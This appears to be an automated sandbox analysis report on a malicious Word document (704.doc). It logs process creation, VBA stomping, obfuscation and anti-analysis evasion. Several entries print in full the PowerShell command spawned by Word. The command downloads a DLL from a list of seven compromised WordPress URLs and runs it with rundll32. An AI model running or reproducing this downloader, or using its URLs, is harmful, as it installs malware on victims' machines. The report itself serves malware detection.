Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....3................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....K................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....K................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....W................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....W................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....{.......t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .<.<.<.<. . .$.d.f.k.j.....0.b...............T.....<.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....{................m.k......................7.............}..v....`.......0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................l.k......T...............7.............}..v....(%......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k.....%................7.............}..v....`&......0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v.....*......0.b...............T.....,.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k....8+................7.............}..v.....+......0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................l.k......T...............7.............}..v.....2......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k....83................7.............}..v.....3......0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.b...............T.....<.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k.....8................7.............}..v....09......0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ ........l.k......T...............7.............}..v.....<......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k....x=................7.............}..v.....=......0.b.............h.T.............(............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$704.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp
Source: classification engine Classification label: mal92.expl.evad.winDOC@5/13@0/0
Source: 704.doc OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: ~DF59F33552EDE7EF7C.TMP.0.dr Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations
Obfuscated command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916 Thread sleep time: -922337203685477s >= -30000s
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FF00260F3C sldt word ptr [eax] 4_2_000007FF00260F3C
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: 704.doc OLE indicator, VBA stomping: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE indicator, VBA stomping: true
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
No contacted IP infos